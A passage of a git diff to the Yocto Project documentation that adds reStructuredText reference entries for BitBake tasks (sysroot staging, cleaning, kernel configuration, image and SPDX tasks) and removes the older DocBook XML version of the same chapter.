+section in the Yocto Project Overview and Concepts Manual for more
+information.
+
+.. _ref-tasks-populate_sdk_ext:
+
+``do_populate_sdk_ext``
+-----------------------
+
+Creates the file and directory structure for an installable extensible 
+SDK (eSDK). See the ":ref:`sdk-generation-dev-environment`"
+section in the Yocto Project Overview and Concepts Manual for more
+information.
+
+
+.. _ref-tasks-populate_sysroot:
+
+``do_populate_sysroot``
+-----------------------
+
+Stages (copies) a subset of the files installed by the
+:ref:`ref-tasks-install` task into the appropriate
+sysroot. For information on how to access these files from other
+recipes, see the :term:`STAGING_DIR* <STAGING_DIR_HOST>` variables.
+Directories that would typically not be needed by other recipes at build
+time (e.g. ``/etc``) are not copied by default.
+
+For information on what directories are copied by default, see the
+:term:`SYSROOT_DIRS* <SYSROOT_DIRS>` variables. You can change
+these variables inside your recipe if you need to make additional (or
+fewer) directories available to other recipes at build time.
+
+The ``do_populate_sysroot`` task is a shared state (sstate) task, which
+means that the task can be accelerated through sstate use. Realize also
+that if the task is re-executed, any previous output is removed (i.e.
+"cleaned").
+
+.. _ref-tasks-prepare_recipe_sysroot:
+
+``do_prepare_recipe_sysroot``
+-----------------------------
+
+Installs the files into the individual recipe specific sysroots (i.e.
+``recipe-sysroot`` and ``recipe-sysroot-native`` under
+``${``\ :term:`WORKDIR`\ ``}`` based upon the
+dependencies specified by :term:`DEPENDS`). See the
+":ref:`staging <ref-classes-staging>`" class for more information.
+
+.. _ref-tasks-rm_work:
+
+``do_rm_work``
+--------------
+
+Removes work files after the OpenEmbedded build system has finished with
+them. You can learn more by looking at the
+":ref:`rm_work.bbclass <ref-classes-rm-work>`" section.
+
+.. _ref-tasks-unpack:
+
+``do_unpack``
+-------------
+
+Unpacks the source code into a working directory pointed to by
+``${``\ :term:`WORKDIR`\ ``}``. The :term:`S`
+variable also plays a role in where unpacked source files ultimately
+reside. For more information on how source files are unpacked, see the
+":ref:`source-fetching-dev-environment`"
+section in the Yocto Project Overview and Concepts Manual and also see
+the ``WORKDIR`` and ``S`` variable descriptions.
+
+Manually Called Tasks
+=====================
+
+These tasks are typically manually triggered (e.g. by using the
+``bitbake -c`` command-line option):
+
+.. _ref-tasks-checkpkg:
+
+``do_checkpkg``
+---------------
+
+Provides information about the recipe including its upstream version and
+status. The upstream version and status reveals whether or not a version
+of the recipe exists upstream and a status of not updated, updated, or
+unknown.
+
+To check the upstream version and status of a recipe, use the following
+devtool commands:
+::
+
+   $ devtool latest-version
+   $ devtool check-upgrade-status
+
+See the ":ref:`ref-manual/ref-devtool-reference:\`\`devtool\`\` quick reference`"
+chapter for more information on
+``devtool``. See the ":ref:`devtool-checking-on-the-upgrade-status-of-a-recipe`"
+section for information on checking the upgrade status of a recipe.
+
+To build the ``checkpkg`` task, use the ``bitbake`` command with the
+"-c" option and task name:
+::
+
+   $ bitbake core-image-minimal -c checkpkg
+
+By default, the results are stored in :term:`$LOG_DIR <LOG_DIR>` (e.g.
+``$BUILD_DIR/tmp/log``).
+
+.. _ref-tasks-checkuri:
+
+``do_checkuri``
+---------------
+
+Validates the :term:`SRC_URI` value.
+
+.. _ref-tasks-clean:
+
+``do_clean``
+------------
+
+Removes all output files for a target from the
+:ref:`ref-tasks-unpack` task forward (i.e. ``do_unpack``,
+:ref:`ref-tasks-configure`,
+:ref:`ref-tasks-compile`,
+:ref:`ref-tasks-install`, and
+:ref:`ref-tasks-package`).
+
+You can run this task using BitBake as follows:
+::
+
+   $ bitbake -c clean recipe
+
+Running this task does not remove the
+:ref:`sstate <overview-manual/overview-manual-concepts:shared state cache>` cache files.
+Consequently, if no changes have been made and the recipe is rebuilt
+after cleaning, output files are simply restored from the sstate cache.
+If you want to remove the sstate cache files for the recipe, you need to
+use the :ref:`ref-tasks-cleansstate` task instead
+(i.e. ``bitbake -c cleansstate`` recipe).
+
+.. _ref-tasks-cleanall:
+
+``do_cleanall``
+---------------
+
+Removes all output files, shared state
+(:ref:`sstate <overview-manual/overview-manual-concepts:shared state cache>`) cache, and
+downloaded source files for a target (i.e. the contents of
+:term:`DL_DIR`). Essentially, the ``do_cleanall`` task is
+identical to the :ref:`ref-tasks-cleansstate` task
+with the added removal of downloaded source files.
+
+You can run this task using BitBake as follows:
+::
+
+   $ bitbake -c cleanall recipe
+
+Typically, you would not normally use the ``cleanall`` task. Do so only
+if you want to start fresh with the :ref:`ref-tasks-fetch`
+task.
+
+.. _ref-tasks-cleansstate:
+
+``do_cleansstate``
+------------------
+
+Removes all output files and shared state
+(:ref:`sstate <overview-manual/overview-manual-concepts:shared state cache>`) cache for a
+target. Essentially, the ``do_cleansstate`` task is identical to the
+:ref:`ref-tasks-clean` task with the added removal of
+shared state (:ref:`sstate <overview-manual/overview-manual-concepts:shared state cache>`)
+cache.
+
+You can run this task using BitBake as follows:
+::
+
+   $ bitbake -c cleansstate recipe
+
+When you run the ``do_cleansstate`` task, the OpenEmbedded build system
+no longer uses any sstate. Consequently, building the recipe from
+scratch is guaranteed.
+
+.. note::
+
+   The ``do_cleansstate`` task cannot remove sstate from a remote sstate
+   mirror. If you need to build a target from scratch using remote mirrors, use
+   the "-f" option as follows:
+   ::
+
+      $ bitbake -f -c do_cleansstate target
+
+
+.. _ref-tasks-devpyshell:
+
+``do_devpyshell``
+-----------------
+
+Starts a shell in which an interactive Python interpreter allows you to
+interact with the BitBake build environment. From within this shell, you
+can directly examine and set bits from the data store and execute
+functions as if within the BitBake environment. See the ":ref:`platdev-appdev-devpyshell`" section in
+the Yocto Project Development Tasks Manual for more information about
+using ``devpyshell``.
+
+.. _ref-tasks-devshell:
+
+``do_devshell``
+---------------
+
+Starts a shell whose environment is set up for development, debugging,
+or both. See the ":ref:`platdev-appdev-devshell`" section in the
+Yocto Project Development Tasks Manual for more information about using
+``devshell``.
+
+.. _ref-tasks-listtasks:
+
+``do_listtasks``
+----------------
+
+Lists all defined tasks for a target.
+
+.. _ref-tasks-package_index:
+
+``do_package_index``
+--------------------
+
+Creates or updates the index in the :ref:`package-feeds-dev-environment` area.
+
+.. note::
+
+   This task is not triggered with the ``bitbake -c`` command-line option as
+   are the other tasks in this section. Because this task is specifically for
+   the ``package-index`` recipe, you run it using ``bitbake package-index``.
+
+Image-Related Tasks
+===================
+
+The following tasks are applicable to image recipes.
+
+.. _ref-tasks-bootimg:
+
+``do_bootimg``
+--------------
+
+Creates a bootable live image. See the
+:term:`IMAGE_FSTYPES` variable for additional
+information on live image types.
+
+.. _ref-tasks-bundle_initramfs:
+
+``do_bundle_initramfs``
+-----------------------
+
+Combines an initial RAM disk (initramfs) image and kernel together to
+form a single image. The
+:term:`CONFIG_INITRAMFS_SOURCE` variable
+has some more information about these types of images.
+
+.. _ref-tasks-rootfs:
+
+``do_rootfs``
+-------------
+
+Creates the root filesystem (file and directory structure) for an image.
+See the ":ref:`image-generation-dev-environment`"
+section in the Yocto Project Overview and Concepts Manual for more
+information on how the root filesystem is created.
+
+.. _ref-tasks-testimage:
+
+``do_testimage``
+----------------
+
+Boots an image and performs runtime tests within the image. For
+information on automatically testing images, see the
+":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-tasks-testimage_auto:
+
+``do_testimage_auto``
+---------------------
+
+Boots an image and performs runtime tests within the image immediately
+after it has been built. This task is enabled when you set
+:term:`TESTIMAGE_AUTO` equal to "1".
+
+For information on automatically testing images, see the
+":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+section in the Yocto Project Development Tasks Manual.
+
+Kernel-Related Tasks
+====================
+
+The following tasks are applicable to kernel recipes. Some of these
+tasks (e.g. the :ref:`ref-tasks-menuconfig` task) are
+also applicable to recipes that use Linux kernel style configuration
+such as the BusyBox recipe.
+
+.. _ref-tasks-compile_kernelmodules:
+
+``do_compile_kernelmodules``
+----------------------------
+
+Runs the step that builds the kernel modules (if needed). Building a
+kernel consists of two steps: 1) the kernel (``vmlinux``) is built, and
+2) the modules are built (i.e. ``make modules``).
+
+.. _ref-tasks-diffconfig:
+
+``do_diffconfig``
+-----------------
+
+When invoked by the user, this task creates a file containing the
+differences between the original config as produced by
+:ref:`ref-tasks-kernel_configme` task and the
+changes made by the user with other methods (i.e. using
+(:ref:`ref-tasks-kernel_menuconfig`). Once the
+file of differences is created, it can be used to create a config
+fragment that only contains the differences. You can invoke this task
+from the command line as follows:
+::
+
+   $ bitbake linux-yocto -c diffconfig
+
+For more information, see the
+":ref:`kernel-dev/kernel-dev-common:creating configuration fragments`"
+section in the Yocto Project Linux Kernel Development Manual.
+
+.. _ref-tasks-kernel_checkout:
+
+``do_kernel_checkout``
+----------------------
+
+Converts the newly unpacked kernel source into a form with which the
+OpenEmbedded build system can work. Because the kernel source can be
+fetched in several different ways, the ``do_kernel_checkout`` task makes
+sure that subsequent tasks are given a clean working tree copy of the
+kernel with the correct branches checked out.
+
+.. _ref-tasks-kernel_configcheck:
+
+``do_kernel_configcheck``
+-------------------------
+
+Validates the configuration produced by the
+:ref:`ref-tasks-kernel_menuconfig` task. The
+``do_kernel_configcheck`` task produces warnings when a requested
+configuration does not appear in the final ``.config`` file or when you
+override a policy configuration in a hardware configuration fragment.
+You can run this task explicitly and view the output by using the
+following command:
+::
+
+   $ bitbake linux-yocto -c kernel_configcheck -f
+
+For more information, see the
+":ref:`kernel-dev/kernel-dev-common:validating configuration`"
+section in the Yocto Project Linux Kernel Development Manual.
+
+.. _ref-tasks-kernel_configme:
+
+``do_kernel_configme``
+----------------------
+
+After the kernel is patched by the :ref:`ref-tasks-patch`
+task, the ``do_kernel_configme`` task assembles and merges all the
+kernel config fragments into a merged configuration that can then be
+passed to the kernel configuration phase proper. This is also the time
+during which user-specified defconfigs are applied if present, and where
+configuration modes such as ``--allnoconfig`` are applied.
+
+.. _ref-tasks-kernel_menuconfig:
+
+``do_kernel_menuconfig``
+------------------------
+
+Invoked by the user to manipulate the ``.config`` file used to build a
+linux-yocto recipe. This task starts the Linux kernel configuration
+tool, which you then use to modify the kernel configuration.
+
+.. note::
+
+   You can also invoke this tool from the command line as follows:
+   ::
+
+           $ bitbake linux-yocto -c menuconfig
+
+
+See the ":ref:`kernel-dev/kernel-dev-common:using \`\`menuconfig\`\``"
+section in the Yocto Project Linux Kernel Development Manual for more
+information on this configuration tool.
+
+.. _ref-tasks-kernel_metadata:
+
+``do_kernel_metadata``
+----------------------
+
+Collects all the features required for a given kernel build, whether the
+features come from :term:`SRC_URI` or from Git
+repositories. After collection, the ``do_kernel_metadata`` task
+processes the features into a series of config fragments and patches,
+which can then be applied by subsequent tasks such as
+:ref:`ref-tasks-patch` and
+:ref:`ref-tasks-kernel_configme`.
+
+.. _ref-tasks-menuconfig:
+
+``do_menuconfig``
+-----------------
+
+Runs ``make menuconfig`` for the kernel. For information on
+``menuconfig``, see the
+":ref:`kernel-dev/kernel-dev-common:using \`\`menuconfig\`\``"
+section in the Yocto Project Linux Kernel Development Manual.
+
+.. _ref-tasks-savedefconfig:
+
+``do_savedefconfig``
+--------------------
+
+When invoked by the user, creates a defconfig file that can be used
+instead of the default defconfig. The saved defconfig contains the
+differences between the default defconfig and the changes made by the
+user using other methods (i.e. the
+:ref:`ref-tasks-kernel_menuconfig` task. You
+can invoke the task using the following command:
+::
+
+   $ bitbake linux-yocto -c savedefconfig
+
+.. _ref-tasks-shared_workdir:
+
+``do_shared_workdir``
+---------------------
+
+After the kernel has been compiled but before the kernel modules have
+been compiled, this task copies files required for module builds and
+which are generated from the kernel build into the shared work
+directory. With these copies successfully copied, the
+:ref:`ref-tasks-compile_kernelmodules` task
+can successfully build the kernel modules in the next step of the build.
+
+.. _ref-tasks-sizecheck:
+
+``do_sizecheck``
+----------------
+
+After the kernel has been built, this task checks the size of the
+stripped kernel image against
+:term:`KERNEL_IMAGE_MAXSIZE`. If that
+variable was set and the size of the stripped kernel exceeds that size,
+the kernel build produces a warning to that effect.
+
+.. _ref-tasks-strip:
+
+``do_strip``
+------------
+
+If ``KERNEL_IMAGE_STRIP_EXTRA_SECTIONS`` is defined, this task strips
+the sections named in that variable from ``vmlinux``. This stripping is
+typically used to remove nonessential sections such as ``.comment``
+sections from a size-sensitive configuration.
+
+.. _ref-tasks-validate_branches:
+
+``do_validate_branches``
+------------------------
+
+After the kernel is unpacked but before it is patched, this task makes
+sure that the machine and metadata branches as specified by the
+:term:`SRCREV` variables actually exist on the specified
+branches. If these branches do not exist and
+:term:`AUTOREV` is not being used, the
+``do_validate_branches`` task fails during the build.
+
+Miscellaneous Tasks
+===================
+
+The following sections describe miscellaneous tasks.
+
+.. _ref-tasks-spdx:
+
+``do_spdx``
+-----------
+
+A build stage that takes the source code and scans it on a remote
+FOSSOLOGY server in order to produce an SPDX document. This task applies
+only to the :ref:`spdx <ref-classes-spdx>` class.
diff --git a/documentation/ref-manual/ref-tasks.xml b/documentation/ref-manual/ref-tasks.xml
deleted file mode 100644
index 011e0d7496..0000000000
--- a/documentation/ref-manual/ref-tasks.xml
+++ /dev/null
@@ -1,1130 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-tasks'>
-<title>Tasks</title>
-
-<para>
-    Tasks are units of execution for BitBake.
-    Recipes (<filename>.bb</filename> files) use tasks to complete
-    configuring, compiling, and packaging software.
-    This chapter provides a reference of the tasks defined in the
-    OpenEmbedded build system.
-</para>
-
-<section id='normal-recipe-build-tasks'>
-    <title>Normal Recipe Build Tasks</title>
-
-    <para>
-        The following sections describe normal tasks associated with building
-        a recipe.
-        For more information on tasks and dependencies, see the
-        "<ulink url='&YOCTO_DOCS_BB_URL;#tasks'>Tasks</ulink>" and
-        "<ulink url='&YOCTO_DOCS_BB_URL;#dependencies'>Dependencies</ulink>"
-        sections in the BitBake User Manual.
-    </para>
-
-    <section id='ref-tasks-build'>
-        <title><filename>do_build</filename></title>
-
-        <para>
-            The default task for all recipes.
-            This task depends on all other normal tasks
-            required to build a recipe.
-        </para>
-    </section>
-
-    <section id='ref-tasks-compile'>
-        <title><filename>do_compile</filename></title>
-
-        <para>
-            Compiles the source code.
-            This task runs with the current working directory set
-            to
-            <filename>${</filename><link linkend='var-B'><filename>B</filename></link><filename>}</filename>.
-        </para>
-
-        <para>
-            The default behavior of this task is to run the
-            <filename>oe_runmake</filename> function if a makefile
-            (<filename>Makefile</filename>, <filename>makefile</filename>,
-            or <filename>GNUmakefile</filename>) is found.
-            If no such file is found, the <filename>do_compile</filename>
-            task does nothing.
-        </para>
-    </section>
-
-    <section id='ref-tasks-compile_ptest_base'>
-        <title><filename>do_compile_ptest_base</filename></title>
-
-        <para>
-            Compiles the runtime test suite included in the software being
-            built.
-        </para>
-    </section>
-
-    <section id='ref-tasks-configure'>
-        <title><filename>do_configure</filename></title>
-
-        <para>
-            Configures the source by enabling and disabling any build-time and
-            configuration options for the software being built.
-            The task runs with the current working directory set to
-            <filename>${</filename><link linkend='var-B'><filename>B</filename></link><filename>}</filename>.
-        </para>
-
-        <para>
-            The default behavior of this task is to run
-            <filename>oe_runmake clean</filename> if a makefile
-            (<filename>Makefile</filename>, <filename>makefile</filename>,
-            or <filename>GNUmakefile</filename>) is found and
-            <link linkend='var-CLEANBROKEN'><filename>CLEANBROKEN</filename></link>
-            is not set to "1".
-            If no such file is found or the <filename>CLEANBROKEN</filename>
-            variable is set to "1", the <filename>do_configure</filename>
-            task does nothing.
-        </para>
-    </section>
-
-    <section id='ref-tasks-configure_ptest_base'>
-        <title><filename>do_configure_ptest_base</filename></title>
-
-        <para>
-            Configures the runtime test suite included in the software being
-            built.
-        </para>
-    </section>
-
-    <section id='ref-tasks-deploy'>
-        <title><filename>do_deploy</filename></title>
-
-        <para>
-            Writes output files that are to be deployed to
-            <filename>${</filename><link linkend='var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></link><filename>}</filename>.
-            The task runs with the current working directory set to
-            <filename>${</filename><link linkend='var-B'><filename>B</filename></link><filename>}</filename>.
-        </para>
-
-        <para>
-            Recipes implementing this task should inherit the
-            <link linkend='ref-classes-deploy'><filename>deploy</filename></link>
-            class and should write the output to
-            <filename>${</filename><link linkend='var-DEPLOYDIR'><filename>DEPLOYDIR</filename></link><filename>}</filename>,
-            which is not to be confused with <filename>${DEPLOY_DIR}</filename>.
-            The <filename>deploy</filename> class sets up
-            <filename>do_deploy</filename> as a shared state (sstate) task that
-            can be accelerated through sstate use.
-            The sstate mechanism takes care of copying the output from
-            <filename>${DEPLOYDIR}</filename> to
-            <filename>${DEPLOY_DIR_IMAGE}</filename>.
-            <note>
-            <title>Caution</title>
-                Do not write the output directly to
-                <filename>${DEPLOY_DIR_IMAGE}</filename>, as this causes
-                the sstate mechanism to malfunction.
-            </note>
-        </para>
-
-        <para>
-            The <filename>do_deploy</filename> task is not added as a task
-            by default and consequently needs to be added manually.
-            If you want the task to run after
-            <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>,
-            you can add it by doing the following:
-            <literallayout class='monospaced'>
-     addtask deploy after do_compile
-            </literallayout>
-            Adding <filename>do_deploy</filename> after other tasks works the
-            same way.
-            <note>
-                You do not need to add <filename>before do_build</filename>
-                to the <filename>addtask</filename> command (though it is
-                harmless), because the
-                <link linkend='ref-classes-base'><filename>base</filename></link>
-                class contains the following:
-                <literallayout class='monospaced'>
-     do_build[recrdeptask] += "do_deploy"
-                </literallayout>
-                See the
-                "<ulink url='&YOCTO_DOCS_BB_URL;#dependencies'>Dependencies</ulink>"
-                section in the BitBake User Manual for more information.
-            </note>
-        </para>
-
-        <para>
-            If the <filename>do_deploy</filename> task re-executes, any
-            previous output is removed (i.e. "cleaned").
-        </para>
-    </section>
-
-    <section id='ref-tasks-fetch'>
-        <title><filename>do_fetch</filename></title>
-
-        <para>
-            Fetches the source code.
-            This task uses the
-            <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
-            variable and the argument's prefix to determine the correct
-            <ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>fetcher</ulink>
-            module.
-        </para>
-    </section>
-
-    <section id='ref-tasks-image'>
-        <title><filename>do_image</filename></title>
-
-        <para>
-            Starts the image generation process.
-            The <filename>do_image</filename> task runs after the
-            OpenEmbedded build system has run the
-            <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
-            task during which packages are identified for installation into
-            the image and the root filesystem is created, complete with
-            post-processing.
-        </para>
-
-        <para>
-            The <filename>do_image</filename> task performs pre-processing
-            on the image through the
-            <link linkend='var-IMAGE_PREPROCESS_COMMAND'><filename>IMAGE_PREPROCESS_COMMAND</filename></link>
-            and dynamically generates supporting
-            <filename>do_image_*</filename> tasks as needed.
-        </para>
-
-        <para>
-            For more information on image creation, see the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#image-generation-dev-environment'>Image Generation</ulink>"
-            section in the Yocto Project Overview and Concepts Manual.
-        </para>
-    </section>
-
-    <section id='ref-tasks-image-complete'>
-        <title><filename>do_image_complete</filename></title>
-
-        <para>
-            Completes the image generation process.
-            The <filename>do_image_complete</filename> task runs after the
-            OpenEmbedded build system has run the
-            <link linkend='ref-tasks-image'><filename>do_image</filename></link>
-            task during which image pre-processing occurs and through
-            dynamically generated <filename>do_image_*</filename> tasks the
-            image is constructed.
-        </para>
-
-        <para>
-            The <filename>do_image_complete</filename> task performs
-            post-processing on the image through the
-            <link linkend='var-IMAGE_POSTPROCESS_COMMAND'><filename>IMAGE_POSTPROCESS_COMMAND</filename></link>.
-        </para>
-
-        <para>
-            For more information on image creation, see the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#image-generation-dev-environment'>Image Generation</ulink>"
-            section in the Yocto Project Overview and Concepts Manual.
-        </para>
-    </section>
-
-    <section id='ref-tasks-install'>
-        <title><filename>do_install</filename></title>
-
-        <para>
-            Copies files that are to be packaged into the holding area
-            <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}</filename>.
-            This task runs with the current working directory set to
-            <filename>${</filename><link linkend='var-B'><filename>B</filename></link><filename>}</filename>,
-            which is the compilation directory.
-            The <filename>do_install</filename> task, as well as other tasks
-            that either directly or indirectly depend on the installed files
-            (e.g.
-            <link linkend='ref-tasks-package'><filename>do_package</filename></link>,
-            <link linkend='ref-tasks-package_write_deb'><filename>do_package_write_*</filename></link>,
-            and
-            <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>),
-            run under
-            <ulink url='&YOCTO_DOCS_OM_URL;#fakeroot-and-pseudo'>fakeroot</ulink>.
-            <note>
-                <title>Caution</title>
-
-                <para>
-                    When installing files, be careful not to set the owner and
-                    group IDs of the installed files to unintended values.
-                    Some methods of copying files, notably when using the
-                    recursive <filename>cp</filename> command, can preserve the
-                    UID and/or GID of the original file, which is usually not
-                    what you want.
-                    The
-                    <link linkend='insane-host-user-contaminated'><filename>host-user-contaminated</filename></link>
-                    QA check checks for files that probably have the wrong
-                    ownership.
-                </para>
-
-                <para>
-                    Safe methods for installing files include the following:
-                    <itemizedlist>
-                        <listitem><para>
-                            The <filename>install</filename> utility.
-                            This utility is the preferred method.
-                            </para></listitem>
-                        <listitem><para>
-                            The <filename>cp</filename> command with the
-                            "--no-preserve=ownership" option.
-                            </para></listitem>
-                        <listitem><para>
-                            The <filename>tar</filename> command with the
-                            "--no-same-owner" option.
-                            See the <filename>bin_package.bbclass</filename>
-                            file in the <filename>meta/classes</filename>
-                            directory of the
-                            <link linkend='source-directory'>Source Directory</link>
-                            for an example.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </note>
-        </para>
-    </section>
-
-    <section id='ref-tasks-install_ptest_base'>
-        <title><filename>do_install_ptest_base</filename></title>
-
-        <para>
-            Copies the runtime test suite files from the compilation directory
-            to a holding area.
-        </para>
-    </section>
-
-    <section id='ref-tasks-package'>
-        <title><filename>do_package</filename></title>
-
-        <para>
-            Analyzes the content of the holding area
-            <filename>${</filename><link linkend='var-D'><filename>D</filename></link><filename>}</filename>
-            and splits the content into subsets based on available packages
-            and files.
-            This task makes use of the
-            <link linkend='var-PACKAGES'><filename>PACKAGES</filename></link>
-            and
-            <link linkend='var-FILES'><filename>FILES</filename></link>
-            variables.
-        </para>
-
-        <para>
-            The <filename>do_package</filename> task, in conjunction with the
-            <link linkend='ref-tasks-packagedata'><filename>do_packagedata</filename></link>
-            task, also saves some important package metadata.
-            For additional information, see the
-            <link linkend='var-PKGDESTWORK'><filename>PKGDESTWORK</filename></link>
-            variable and the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#automatically-added-runtime-dependencies'>Automatically Added Runtime Dependencies</ulink>"
-            section in the Yocto Project Overview and Concepts Manual.
-        </para>
-    </section>
-
-    <section id='ref-tasks-package_qa'>
-        <title><filename>do_package_qa</filename></title>
-
-        <para>
-            Runs QA checks on packaged files.
-            For more information on these checks, see the
-            <link linkend='ref-classes-insane'><filename>insane</filename></link>
-            class.
-        </para>
-    </section>
-
-    <section id='ref-tasks-package_write_deb'>
-        <title><filename>do_package_write_deb</filename></title>
-
-        <para>
-            Creates Debian packages (i.e. <filename>*.deb</filename> files) and
-            places them in the
-            <filename>${</filename><link linkend='var-DEPLOY_DIR_DEB'><filename>DEPLOY_DIR_DEB</filename></link><filename>}</filename>
-            directory in the package feeds area.
-            For more information, see the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
-            section in the Yocto Project Overview and Concepts Manual.
-        </para>
-    </section>
-
-    <section id='ref-tasks-package_write_ipk'>
-        <title><filename>do_package_write_ipk</filename></title>
-
-        <para>
-            Creates IPK packages (i.e. <filename>*.ipk</filename> files) and
-            places them in the
-            <filename>${</filename><link linkend='var-DEPLOY_DIR_IPK'><filename>DEPLOY_DIR_IPK</filename></link><filename>}</filename>
-            directory in the package feeds area.
-            For more information, see the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
-            section in the Yocto Project Overview and Concepts Manual.
-        </para>
-    </section>
-
-    <section id='ref-tasks-package_write_rpm'>
-        <title><filename>do_package_write_rpm</filename></title>
-
-        <para>
-            Creates RPM packages (i.e. <filename>*.rpm</filename> files) and
-            places them in the
-            <filename>${</filename><link linkend='var-DEPLOY_DIR_RPM'><filename>DEPLOY_DIR_RPM</filename></link><filename>}</filename>
-            directory in the package feeds area.
-            For more information, see the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
-            section in the Yocto Project Overview and Concepts Manual.
-        </para>
-    </section>
-
-    <section id='ref-tasks-package_write_tar'>
-        <title><filename>do_package_write_tar</filename></title>
-
-        <para>
-            Creates tarballs and places them in the
-            <filename>${</filename><link linkend='var-DEPLOY_DIR_TAR'><filename>DEPLOY_DIR_TAR</filename></link><filename>}</filename>
-            directory in the package feeds area.
-            For more information, see the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#package-feeds-dev-environment'>Package Feeds</ulink>"
-            section in the Yocto Project Overview and Concepts Manual.
-        </para>
-    </section>
-
-    <section id='ref-tasks-packagedata'>
-        <title><filename>do_packagedata</filename></title>
-
-        <para>
-            Saves package metadata generated by the
-            <link linkend='ref-tasks-package'><filename>do_package</filename></link>
-            task in
-            <link linkend='var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></link>
-            to make it available globally.
-        </para>
-    </section>
-
-    <section id='ref-tasks-patch'>
-        <title><filename>do_patch</filename></title>
-
-        <para>
-            Locates patch files and applies them to the source code.
-        </para>
-
-        <para>
-            After fetching and unpacking source files, the build system
-            uses the recipe's
-            <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
-            statements to locate and apply patch files to the source code.
-            <note>
-                The build system uses the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-FILESPATH'><filename>FILESPATH</filename></ulink>
-                variable to determine the default set of directories when
-                searching for patches.
-            </note>
-            Patch files, by default, are <filename>*.patch</filename> and
-            <filename>*.diff</filename> files created and kept in a
-            subdirectory of the directory holding the recipe file.
-            For example, consider the
-            <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta/recipes-connectivity/bluez5'><filename>bluez5</filename></ulink>
-            recipe from the OE-Core layer (i.e.
-            <filename>poky/meta</filename>):
-            <literallayout class='monospaced'>
-     poky/meta/recipes-connectivity/bluez5
-            </literallayout>
-            This recipe has two patch files located here:
-            <literallayout class='monospaced'>
-     poky/meta/recipes-connectivity/bluez5/bluez5
-            </literallayout>
-        </para>
-
-        <para>
-            In the <filename>bluez5</filename> recipe, the
-            <filename>SRC_URI</filename> statements point to the source and
-            patch files needed to build the package.
-            <note>
-                In the case for the <filename>bluez5_5.48.bb</filename>
-                recipe, the <filename>SRC_URI</filename> statements are from an
-                include file <filename>bluez5.inc</filename>.
-            </note>
-        </para>
-
-        <para>
-            As mentioned earlier, the build system treats files whose file
-            types are <filename>.patch</filename> and
-            <filename>.diff</filename> as patch files.
-            However, you can use the "apply=yes" parameter with the
-            <filename>SRC_URI</filename> statement to indicate any file as a
-            patch file:
-            <literallayout class='monospaced'>
-     SRC_URI = " \
-          git://<replaceable>path_to_repo</replaceable>/<replaceable>some_package</replaceable> \
-          file://<replaceable>file</replaceable>;apply=yes \
-     "
-            </literallayout>
-        </para>
-
-        <para>
-            Conversely, if you have a directory full of patch files and you
-            want to exclude some so that the <filename>do_patch</filename>
-            task does not apply them during the patch phase, you can use
-            the "apply=no" parameter with the <filename>SRC_URI</filename>
-            statement:
-            <literallayout class='monospaced'>
-     SRC_URI = " \
-          git://<replaceable>path_to_repo</replaceable>/<replaceable>some_package</replaceable> \
-          file://<replaceable>path_to_lots_of_patch_files</replaceable> \
-          file://<replaceable>path_to_lots_of_patch_files</replaceable>/<replaceable>patch_file5</replaceable>;apply=no \
-     "
-            </literallayout>
-            In the previous example, assuming all the files in the directory
-            holding the patch files end with either <filename>.patch</filename>
-            or <filename>.diff</filename>, every file would be applied as a
-            patch by default except for the
-            <replaceable>patch_file5</replaceable> patch.
-        </para>
-
-        <para>
-            You can find out more about the patching process in the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#patching-dev-environment'>Patching</ulink>"
-            section in the Yocto Project Overview and Concepts Manual and the
-            "<ulink url='&YOCTO_DOCS_DEV_URL;#new-recipe-patching-code'>Patching Code</ulink>"
-            section in the Yocto Project Development Tasks Manual.
-        </para>
-    </section>
-
-    <section id='ref-tasks-populate_lic'>
-        <title><filename>do_populate_lic</filename></title>
-
-        <para>
-            Writes license information for the recipe that is collected later
-            when the image is constructed.
-        </para>
-    </section>
-
-    <section id='ref-tasks-populate_sdk'>
-        <title><filename>do_populate_sdk</filename></title>
-
-        <para>
-            Creates the file and directory structure for an installable SDK.
-            See the
-            "<ulink url='&YOCTO_DOCS_OM_URL;#sdk-generation-dev-environment'>SDK Generation</ulink>"
-            section in the Yocto Project Overview and Concepts Manual for more
-            information.
-        </para>
-    </section>
-
-    <section id='ref-tasks-populate_sysroot'>
-        <title><filename>do_populate_sysroot</filename></title>
-
-        <para>
-            Stages (copies) a subset of the files installed by the
-            <link linkend='ref-tasks-install'><filename>do_install</filename></link>
-            task into the appropriate sysroot.
-            For information on how to access these files from other recipes,
-            see the
-            <link linkend='var-STAGING_DIR_HOST'><filename>STAGING_DIR*</filename></link>
-            variables.
-            Directories that would typically not be needed by other recipes at
-            build time (e.g. <filename>/etc</filename>) are not copied by
-            default.
-        </para>
-
-        <para>
-            For information on what directories are copied by default, see the
-            <link linkend='var-SYSROOT_DIRS'><filename>SYSROOT_DIRS*</filename></link>
-            variables.
